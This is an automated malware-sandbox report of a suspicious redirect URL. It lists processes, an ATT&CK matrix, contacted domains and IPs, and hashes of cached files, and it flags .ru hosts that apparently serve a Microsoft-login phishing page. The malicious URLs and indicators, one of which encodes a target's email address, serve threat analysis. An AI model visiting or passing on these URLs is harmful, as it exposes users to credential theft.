Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
Browser Extensions
1
Process Injection
1
Process Injection
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://emp.eduyield.com/el?aid=962445be-3c17-11ec-9620-0e45aa61dde5&cid=497&dest=https://google.com/amp/avrancecorp.com/wp-web/Griffinwink/64616b6f74616c796e6e406772696666696e77696e6b2e636f6d/$ZGFrb3&pid=564628&rid=687307890%Avira URL Cloudsafe
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://ozniouyw1ohpamkudf3szxjee1d5tc4cbcooevk3tmcqsteggki0ky.deryposi.ru/UEaVhvAGqbXXRrxZgwkVGIAFMLJFCKDBJATYTKVUYGKYOKYGELQQ100%Avira URL Cloudmalware
https://avrancecorp.com/404.shtml0%Avira URL Cloudsafe
https://wv.bomirax.ru/Z1cxl9eG/0%Avira URL Cloudsafe
http://avrancecorp.com/favicon.ico0%Avira URL Cloudsafe
https://wv.bomirax.ru/favicon.ico0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
google.com
142.250.185.78
truefalse
    high
    a.nel.cloudflare.com
    35.190.80.1
    truefalse
      high
      emp.eduyield.com
      34.225.212.255
      truefalse
        unknown
        s-part-0033.t-0009.t-msedge.net
        13.107.246.61
        truefalse
          high
          s-part-0017.t-0009.t-msedge.net
          13.107.246.45
          truefalse
            high
            avrancecorp.com
            50.6.174.34
            truefalse
              unknown
              wv.bomirax.ru
              104.21.96.1
              truetrue
                unknown
                code.jquery.com
                151.101.194.137
                truefalse
                  high
                  cdnjs.cloudflare.com
                  104.17.25.14
                  truefalse
                    high
                    challenges.cloudflare.com
                    104.18.94.41
                    truefalse
                      high
                      sni1gl.wpc.omegacdn.net
                      152.199.21.175
                      truefalse
                        high
                        www.google.com
                        142.250.65.164
                        truefalse
                          high
                          ozniouyw1ohpamkudf3szxjee1d5tc4cbcooevk3tmcqsteggki0ky.deryposi.ru
                          188.114.97.3
                          truefalse
                            unknown
                            www.office.com
                            unknown
                            unknownfalse
                              high
                              aadcdn.msftauth.net
                              unknown
                              unknownfalse
                                high
                                identity.nel.measure.office.net
                                unknown
                                unknownfalse
                                  high
                                  login.microsoftonline.com
                                  unknown
                                  unknownfalse
                                    high
                                    NameMaliciousAntivirus DetectionReputation
                                    https://avrancecorp.com/404.shtmlfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://emp.eduyield.com/el?aid=962445be-3c17-11ec-9620-0e45aa61dde5&cid=497&dest=https://google.com/amp/avrancecorp.com/wp-web/Griffinwink/64616b6f74616c796e6e406772696666696e77696e6b2e636f6d/$ZGFrb3&pid=564628&rid=68730789false
                                      unknown
                                      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1false
                                        high
                                        https://code.jquery.com/jquery-3.6.0.min.jsfalse
                                          high
                                          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/9020d7826b0a4252/1736891429985/QCebGfkPR2Y-Xxmfalse
                                            high
                                            https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.jsfalse
                                              high
                                              https://a.nel.cloudflare.com/report/v4?s=VBdI44kQ3SIo4qhmrwYt25vhYAXWUuuqAzxzgUS8%2Fp4BtIc7WnRuSYREC%2Fy9FGJSdjPn%2F8uVjalVJ%2F0aYtZkpEh%2F8hb8ughRK8HRDQ2XjGRGYlundQYwvH8cZPfclQ%3D%3Dfalse
                                                high
                                                https://wv.bomirax.ru/Z1cxl9eG/#M$ZGFrb3true
                                                  unknown
                                                  https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724882478992495.ODdiNTc0ODItYTUzMC00MzczLTgwOWEtMzhiNDU2OWY2MzNmYzIxYmIxNjctMmJiNC00MDM2LWIyMzMtNjkyNDdiMGFmNTk5&ui_locales=en-US&mkt=en-US&client-request-id=e5559160-285c-4d31-b09a-60cd56c2bc4f&state=kUmcxyqFQc1_xTECdpd6JPep2e-zpn8l_VjnfoqbjrPkG7PBWst5BJFHauh7g2AhZBdmhGmIeCno-TrfJ351moJah_8TYyoaAVHpP_PUv9CqJHEwHDdhNesQIVOn24zbByu_b5M1MUUJlNgvGr8ccr63sTBZdaohFMXL0gNqxC2E6b_FHtbzxU6cYs1FE-_0TqtFLB-fUXMfaKasihl2MzkYWOdkWieVDQkHPjbFlbNCiT37YVVMm7Q3-tO-TWYnFJ8LIBpOuwCVYSY_JDze5g&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0false
                                                    high
                                                    https://ozniouyw1ohpamkudf3szxjee1d5tc4cbcooevk3tmcqsteggki0ky.deryposi.ru/UEaVhvAGqbXXRrxZgwkVGIAFMLJFCKDBJATYTKVUYGKYOKYGELQQfalse
                                                    • Avira URL Cloud: malware
                                                    unknown
                                                    https://challenges.cloudflare.com/turnstile/v0/b/e0c90b6a3ed1/api.jsfalse
                                                      high
                                                      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/flow/ov1/1007293128:1736889469:3tFZVfEdHPgvRe4lFj_YIENTci-pgZz_bRcHbKlmagY/9020d7826b0a4252/5oMQoLsc2iOSixT_.cVI8XgYxH9viTIw7cmt1hNSqfE-1736891428-1.1.1.1-EcOzoDxYUj5Kq8T8UJb37UVA.AmT90LxN48yVCYD0ckCIbW51Z93jUI_qQzBlJ5Qfalse
                                                        high
                                                        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/g5agr/0x4AAAAAAA2On-0a6Rkou75J/auto/fbE/normal/auto/false
                                                          high
                                                          https://google.com/amp/avrancecorp.com/wp-web/Griffinwink/64616b6f74616c796e6e406772696666696e77696e6b2e636f6d/$ZGFrb3false
                                                            high
                                                            http://avrancecorp.com/favicon.icofalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://avrancecorp.com/wp-web/Griffinwink/64616b6f74616c796e6e406772696666696e77696e6b2e636f6d/$ZGFrb3false
                                                              unknown
                                                              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=9020d7826b0a4252&lang=autofalse
                                                                high
                                                                https://wv.bomirax.ru/Z1cxl9eG/true
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://wv.bomirax.ru/favicon.icofalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638724882478992495.ODdiNTc0ODItYTUzMC00MzczLTgwOWEtMzhiNDU2OWY2MzNmYzIxYmIxNjctMmJiNC00MDM2LWIyMzMtNjkyNDdiMGFmNTk5&ui_locales=en-US&mkt=en-US&client-request-id=e5559160-285c-4d31-b09a-60cd56c2bc4f&state=kUmcxyqFQc1_xTECdpd6JPep2e-zpn8l_VjnfoqbjrPkG7PBWst5BJFHauh7g2AhZBdmhGmIeCno-TrfJ351moJah_8TYyoaAVHpP_PUv9CqJHEwHDdhNesQIVOn24zbByu_b5M1MUUJlNgvGr8ccr63sTBZdaohFMXL0gNqxC2E6b_FHtbzxU6cYs1FE-_0TqtFLB-fUXMfaKasihl2MzkYWOdkWieVDQkHPjbFlbNCiT37YVVMm7Q3-tO-TWYnFJ8LIBpOuwCVYSY_JDze5g&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=truefalse
                                                                  high
                                                                  https://www.google.com/amp/avrancecorp.com/wp-web/Griffinwink/64616b6f74616c796e6e406772696666696e77696e6b2e636f6d/$ZGFrb3false
                                                                    high
                                                                    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/9020d7826b0a4252/1736891429983/4a6352fba8f36f1d421afad8b8981ebc29ca0902dd09b6ab6dd48ce433b246d7/WyIS0zUE02_aIyJfalse
                                                                      high
                                                                      NameSourceMaliciousAntivirus DetectionReputation
                                                                      https://login.microsoftonline.comchromecache_70.2.dr, chromecache_77.2.drfalse
                                                                        high
                                                                        https://login.windows-ppe.netchromecache_70.2.dr, chromecache_77.2.drfalse
                                                                          high
                                                                          • No. of IPs < 25%
                                                                          • 25% < No. of IPs < 50%
                                                                          • 50% < No. of IPs < 75%
                                                                          • 75% < No. of IPs
                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                          142.250.185.78
                                                                          google.comUnited States
                                                                          15169GOOGLEUSfalse
                                                                          104.18.94.41
                                                                          challenges.cloudflare.comUnited States
                                                                          13335CLOUDFLARENETUSfalse
                                                                          104.21.96.1
                                                                          wv.bomirax.ruUnited States
                                                                          13335CLOUDFLARENETUStrue
                                                                          151.101.194.137
                                                                          code.jquery.comUnited States
                                                                          54113FASTLYUSfalse
                                                                          35.190.80.1
                                                                          a.nel.cloudflare.comUnited States
                                                                          15169GOOGLEUSfalse
                                                                          50.6.174.34
                                                                          avrancecorp.comUnited States
                                                                          46606UNIFIEDLAYER-AS-1USfalse
                                                                          104.18.95.41
                                                                          unknownUnited States
                                                                          13335CLOUDFLARENETUSfalse
                                                                          151.101.2.137
                                                                          unknownUnited States
                                                                          54113FASTLYUSfalse
                                                                          239.255.255.250
                                                                          unknownReserved
                                                                          unknownunknownfalse
                                                                          188.114.97.3
                                                                          ozniouyw1ohpamkudf3szxjee1d5tc4cbcooevk3tmcqsteggki0ky.deryposi.ruEuropean Union
                                                                          13335CLOUDFLARENETUSfalse
                                                                          34.225.212.255
                                                                          emp.eduyield.comUnited States
                                                                          14618AMAZON-AESUSfalse
                                                                          142.250.65.164
                                                                          www.google.comUnited States
                                                                          15169GOOGLEUSfalse
                                                                          104.17.25.14
                                                                          cdnjs.cloudflare.comUnited States
                                                                          13335CLOUDFLARENETUSfalse
                                                                          IP
                                                                          192.168.2.4
                                                                          192.168.2.5
                                                                          Joe Sandbox version:42.0.0 Malachite
                                                                          Analysis ID:1591369
                                                                          Start date and time:2025-01-14 22:49:19 +01:00
                                                                          Joe Sandbox product:CloudBasic
                                                                          Overall analysis duration:0h 3m 8s
                                                                          Hypervisor based Inspection enabled:false
                                                                          Report type:full
                                                                          Cookbook file name:browseurl.jbs
                                                                          Sample URL:https://emp.eduyield.com/el?aid=962445be-3c17-11ec-9620-0e45aa61dde5&cid=497&dest=https://google.com/amp/avrancecorp.com/wp-web/Griffinwink/64616b6f74616c796e6e406772696666696e77696e6b2e636f6d/$ZGFrb3&pid=564628&rid=68730789
                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                          Number of analysed new started processes analysed:8
                                                                          Number of new started drivers analysed:0
                                                                          Number of existing processes analysed:0
                                                                          Number of existing drivers analysed:0
                                                                          Number of injected processes analysed:0
                                                                          Technologies:
                                                                          • EGA enabled
                                                                          • AMSI enabled
                                                                          Analysis Mode:default
                                                                          Analysis stop reason:Timeout
                                                                          Detection:MAL
                                                                          Classification:mal52.win@22/68@44/15
                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                          • Excluded IPs from analysis (whitelisted): 142.250.186.35, 216.58.206.46, 64.233.184.84, 142.250.184.206, 142.250.186.78, 199.232.214.172, 2.17.190.73, 142.250.185.206, 142.250.186.46, 20.190.159.68, 20.190.159.64, 40.126.31.67, 20.190.159.2, 40.126.31.71, 20.190.159.71, 20.190.159.23, 40.126.31.73, 13.107.6.156, 20.190.159.75, 20.190.159.73, 142.250.185.238, 216.58.212.174, 20.190.159.4, 40.126.31.69, 172.217.23.106, 142.250.186.106, 142.250.184.202, 142.250.186.74, 172.217.18.10, 142.250.74.202, 142.250.185.234, 216.58.206.42, 142.250.185.202, 142.250.181.234, 142.250.186.138, 216.58.212.138, 142.250.185.106, 172.217.16.202, 142.250.186.170, 142.250.185.170, 20.50.73.10, 20.50.80.213, 172.217.16.206, 216.58.206.35, 2.19.126.146, 2.19.126.143, 2.23.242.162, 4.175.87.197, 13.107.246.61, 13.107.246.45
                                                                          • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, www.tm.lg.prod.aadmsa.akadns.net, clientservices.googleapis.com, home-office365-com.b-0004.b-msedge.net, ak.privatelink.msidentity.com, a1894.dscb.akamai.net, clients2.google.com, ocsp.digicert.com, redirector.gvt1.com, login.live.com, update.googleapis.com, login.mso.msidentity.com, www.tm.ak.prd.aadg.trafficmanager.net, prdv4a.aadg.msidentity.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, otelrules.azureedge.net, aadcdnoriginwus2.azureedge.net, www.tm.v4.a.prd.aadg.akadns.net, onedscolprdneu04.northeurope.cloudapp.azure.com, b-0004.b-msedge.net, www.tm.v4.a.prd.aadg.trafficmanager.net, onedscolprdneu08.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, aadcdn.msauth.net, firstparty-azurefd-prod.trafficmanager.net, login.msa.msidentity.com, eu.events.data.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, www.tm.aadcdn.msftauth.akadns.net, edgedl.me.gvt1.com, nel.measure.office.net.edgesuite.net, a
                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                          • VT rate limit hit for: https://emp.eduyield.com/el?aid=962445be-3c17-11ec-9620-0e45aa61dde5&cid=497&dest=https://google.com/amp/avrancecorp.com/wp-web/Griffinwink/64616b6f74616c796e6e406772696666696e77696e6b2e636f6d/$ZGFrb3&pid=564628&rid=68730789
                                                                          No simulations
                                                                          No context
                                                                          No context
                                                                          No context
                                                                          No context
                                                                          No context
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:GIF image data, version 89a, 352 x 3
                                                                          Category:downloaded
                                                                          Size (bytes):2672
                                                                          Entropy (8bit):6.640973516071413
                                                                          Encrypted:false
                                                                          SSDEEP:48:ZaOdwduTYPpS9pZy9vDNi1miicsvrJkafMiS+MGQ09DU/X9/4Xp6m5Z9SQcq:4CIuTYPpSTc9vcPZX9/2gzQ/
                                                                          MD5:166DE53471265253AB3A456DEFE6DA23
                                                                          SHA1:17C6DF4D7CCF1FA2C9EFD716FBAE0FC2C71C8D6D
                                                                          SHA-256:A46201581A7C7C667FD42787CD1E9ADF2F6BF809EFB7596E61A03E8DBA9ADA13
                                                                          SHA-512:80978C1D262BC225A8BA1758DF546E27B5BE8D84CBCF7E6044910E5E05E04AFFEFEC3C0DA0818145EB8A917E1A8D90F4BAC833B64A1F6DE97AD3D5FC80A02308
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://aadcdn.msauth.net/shared/1.0/content/images/marching_ants_white_8257b0707cbe1d0bd2661b80068676fe.gif
                                                                          Preview:GIF89a`............!..NETSCAPE2.0.....!.......,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....0.............<....[.\K8j.tr.g..!.......,....3............^;.*..\UK.]\.%.V.c...!.......,....7........`....lo...[.a..*Rw~i...!.......,....;........h.....l.G-.[K.,_XA]..'g..!.......,....?........i.....g....Z.}..)..u...F..!.......,....C...............P.,nt^.i....Xq...i..!.......,....F...........{^b....n.y..i...\C.-...!.......,....H..............R...o....h.xV!.z#...!.......,"...L.............r.jY..w~aP(.......[i...!.......,(...N.............r....w.aP.j.'.)Y..S..!.......,....H.........`......hew..9`.%z.xVeS..!.......,5...A.........`...\m.Vmtzw.}.d.%...Q..!.......,9...=.........h......3S..s.-W8m...Q..!.......,A...5.........h.....N...:..!..U..!.......,H.............h....M.x...f.i.4..!.......,O...'.........i...tp......(..!.......,X.............j...@.x....!.......,].............j..L..3em..!.......,e.............`......!.......,n..............{i..!..
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 15755
                                                                          Category:dropped
                                                                          Size (bytes):5525
                                                                          Entropy (8bit):7.961202222662501
                                                                          Encrypted:false
                                                                          SSDEEP:96:dySl6/e7OAQD3cS66g8cxO4qXgy66F0+fgENU28TjN3KY6meSsj0ktMvB4YJix2I:dNl6/zFDW6dlXV665ReB67j0sEBWxl
                                                                          MD5:28CE5BF8BACB96D1C2CFA0092145C6EE
                                                                          SHA1:303A4629C4467AF2C551EC9E6353464C8C25827D
                                                                          SHA-256:6B89EEC14865DB53FE20FB3C70B0853362E21669DACE19C06172F673B2EDC5CD
                                                                          SHA-512:6A10794F105EF5C6F7F7DC2C89152A8342E6D9D8D9490783863ED2737FFD5982E916F72E0A9ECB944AB9815FA70BD20C7256A91E2A62D971F80C23822B809A02
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:...........[}w.F....Bh..i3.M.t.rU.....]..M...@.(..........@..N..I-k..;w.....U.F..v....N....]....MC......U.]o>..mJ.w..~.5<......Z.h~8..8J..m......0.&Z:.Z.D_. .Z.....<.f..t..].I:..........b. ...}.ja......'..x......m6..c...$..........b|s......O.a..cE..u.2.*.6jG!.A.....P..?q@?"..).Mk.0.[."V..M..4...4.~}.?.i..D.}h|..$x.Ajm.S..H..-.x.If..]..1.D0.F......pq.(.|...y\...5....y2.q.Fq...[.|..n.b.i_D......xuR......I.TS.4..}|<...o....MG.+@.......\.?."...+[...A..&...{]......u..+p?......|...j....7...=H..cwp.38.;%c.....O..............p...X.g!....r...d..5.%x.....;...j6p...p......c.Nd.:...&.*....%.. tR.d.@.. ...1..6....i....:...s=..V...iN..1../tH..p<..Mo.......`&.7uA;..(lC.......4...?..0..[S@...D..|....=.wh2...<.. ...)..F...!. .C...k...S.pPt......s..K.V...w......7....Zn.d..t]l.........5=.(..#.....l._.Ip......-O.6.,......q4....!XS`6k..k.....9k....{~*.....X....q......l.>x..={j.n..W......e..Q..I/..;a..MS>.!5v.d.B+.o.....q...j.q..Z..=..@g.1q..,yBV91m.j>..4.o...
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                          Category:downloaded
                                                                          Size (bytes):61
                                                                          Entropy (8bit):3.990210155325004
                                                                          Encrypted:false
                                                                          SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                          MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                          SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                          SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                          SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1
                                                                          Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 113769
                                                                          Category:downloaded
                                                                          Size (bytes):35170
                                                                          Entropy (8bit):7.993096534744333
                                                                          Encrypted:true
                                                                          SSDEEP:768:K+LvEzA9nny7u0zF35Hm4ngomu6yeLDKDnccqmcmHvVVPCLVf:ny7f5GpuheL4htv3Pkf
                                                                          MD5:171A4DD9400708B88724B57D62B24A6A
                                                                          SHA1:9C6F1303B8F02FCE18D20EC9CADA11D38D0C4B37
                                                                          SHA-256:EA00750636C11DBD4FA3ACB1B3CDCBAE3EFA43F6B6C3753444B6D6A242AE9336
                                                                          SHA-512:5B13B63912B34E3EEEDD8DA5953B869A83DF82FFD2A8D737AA81DC984F1811800A534F340C48041DA803C25B6B8F5605EA8D003B6A09A1874408F95A710F5126
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://aadcdn.msauth.net/shared/1.0/content/js/asyncchunk/convergedlogin_pstringcustomizationhelper_cc2c59f5ef2c09e14b08.js
                                                                          Preview:...........kC.H.0......e....0.pX..Iv3..\f..0YY.m..e$.K..o...j..g.3.lpW.......[..Y.?k.Y.......8~.a..../_.;]{.............v...0..q.Dk.w...h-....Z<..l.fA..k3.7..dm....b..-...(,.$...4...f...e...AV..z.mA....O.9........k..h-.......<Z[.GQ.v3....Oq..y:..(..k.$_...._..h-...q..S.ck.=.T......Sq@.:.A.c.(....SDq..Ac.t..m.$Lc....Z...K...O<....f9..p...0Z..3.<...$YK.x.F......v....nm..s$...&..dQ4.......n-.-.......E.XD..-5~...f.....t...-_.....fsg...8kZ..|.{{....p+Lg.t9I..P./ap......o9Wx.._{....k..,...............................7.|..t...Ax.7..b..v..v.m-...~v...:....r..._........,...A........z.....|..t.. [.C.....{...~..c......ua...~.v<.I..P#._{{}._.......Km...eR....u?GY..h..}..gAv...<.l.Z...#.....:P?Q..."..........,.D...I<._.'..-..=..;.>.C_..#.....D[0.Y..*...M.....{.YT,...x..SQ/......N<`...|._.k....0)......+.Z..4...M. ...i...`.ml..-X.E.....d.. .}.e4.{6hz^..}....@....W.1...d8...>.@.....(.'[..`..A..?...yL.|..QTF...-.='S@.Q.sM.`...}.t..$..y^..0J.kC.S...U.
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
                                                                          Category:dropped
                                                                          Size (bytes):673
                                                                          Entropy (8bit):7.6596900876595075
                                                                          Encrypted:false
                                                                          SSDEEP:12:Xl0t8TUViiYi5m6FhSBXWPsigK99WCqKMvBBFThSqfLd81CK6bC+k7LqZLsFlD:XFUVpkNK0Rwid81p6btk7LqZ6D
                                                                          MD5:0E176276362B94279A4492511BFCBD98
                                                                          SHA1:389FE6B51F62254BB98939896B8C89EBEFFE2A02
                                                                          SHA-256:9A2C174AE45CAC057822844211156A5ED293E65C5F69E1D211A7206472C5C80C
                                                                          SHA-512:8D61C9E464C8F3C77BF1729E32F92BBB1B426A19907E418862EFE117DBD1F0A26FCC3A6FE1D1B22B836853D43C964F6B6D25E414649767FBEA7FE10D2048D7A1
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q...*..~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1.....*.#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:GIF image data, version 89a, 352 x 3
                                                                          Category:downloaded
                                                                          Size (bytes):3620
                                                                          Entropy (8bit):6.867828878374734
                                                                          Encrypted:false
                                                                          SSDEEP:48:ZumKaT5ezv47j2/ZiRDlq16x8XvEUcg777shHdpHVGJqFd:Eal647jPDlL8XvEUcg77kVGyd
                                                                          MD5:B540A8E518037192E32C4FE58BF2DBAB
                                                                          SHA1:3047C1DB97B86F6981E0AD2F96AF40CDF43511AF
                                                                          SHA-256:8737D721808655F37B333F08A90185699E7E8B9BDAAA15CDB63C8448B426F95D
                                                                          SHA-512:E3612D9E6809EC192F6E2D035290B730871C269A267115E4A5515CADB7E6E14E3DD4290A35ABAA8D14CF1FA3924DC76E11926AC341E0F6F372E9FC5434B546E5
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://aadcdn.msauth.net/shared/1.0/content/images/marching_ants_986f40b5a9dc7d39ef8396797f61b323.gif
                                                                          Preview:GIF89a`.........iii!.......!.&Edited with ezgif.com online GIF maker.!..NETSCAPE2.0.....,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....`.....9..i....Q4......H..j.=.k9-5_..........j7..({.........!.......,....`.....9.......trV.......H....`.[.q6......>.. .CZ.&!.....M...!.......,....`.....8..........:......H..jJ..U..6_....../.el...q.)...*..!.......,....`.....9.....i..l.go.....H..*".U...f......._......5......n..!.......,....`.....:..i......./.....H...5%.kE/5.........In.a..@&3.....J...!.......,....`.....9.......kr.j.....H..*.-.{Im5c..............@&.........!.......,....`.....9.........j..q....H...].&..\.5.........8..S..........!.......,....`.....9.......3q.g..5....H...:u..............Al..x.q.........!.......,....`.....9......\.F....z....H...zX...ov.........h3N.x4......j..!.......,....`.....9........Q.:......H....y..^...1.........n.!.F......E...!.......,....`.....8.........i,......H....*_.21.I.........%...
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                          Category:dropped
                                                                          Size (bytes):17174
                                                                          Entropy (8bit):2.9129715116732746
                                                                          Encrypted:false
                                                                          SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                          MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                          SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                          SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                          SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                          Malicious:false
                                                                          Reputation:low
